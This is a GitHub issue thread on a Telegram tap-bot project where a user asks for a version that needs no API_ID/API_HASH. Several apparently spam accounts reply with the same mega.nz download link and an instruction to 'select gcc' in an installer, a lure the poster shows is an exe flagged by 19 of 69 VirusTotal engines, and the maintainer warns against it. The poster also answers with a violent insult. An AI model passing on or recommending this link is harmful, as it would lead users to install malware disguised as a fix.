### ISSUE TITLE
some question

### ISSUE THREAD

**Issue by SilentWarrior1** [vanhbakaa/Cexio-Tap-bot#2]
Greetings. 
May i ask, maybe you can make a version without API_ID/API_HASH? (for query_id, for example)
I can't get them because no matter what I do, Telegram doesn't provide them to me. Even changing my IP/browser doesn't help.
If you can - this will be awesome!

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by SilentWarrior1** [comment]
> Download https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU In the installer menu, select "gcc."

seriously an "exe" file? --> **19/69** https://www.virustotal.com/gui/file/83248e7c2675805c366abe338975b6820b520a16b782849e4c029a355f5f46e5/detection
> Download https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU In the installer menu, select "gcc."

aah... nice try. but no.

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by SilentWarrior1** [comment]
> Download https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU In the installer menu, select "gcc."

go and kill your parents and friends. then post me a proof. and only then i will install your virus.

**Comment by vanhbakaa** [comment]
dont install that bruh
watch this video: https://www.youtube.com/watch?v=4PG_fpj2gW0

**Comment by SilentWarrior1** [comment]
@vanhbakaa , i know how to get thу api's , but, as i said above - telegram doesn't provide them to me in any way. It just gives me ERROR.
[https://i.imgur.com/FAHSrUA.png](url)
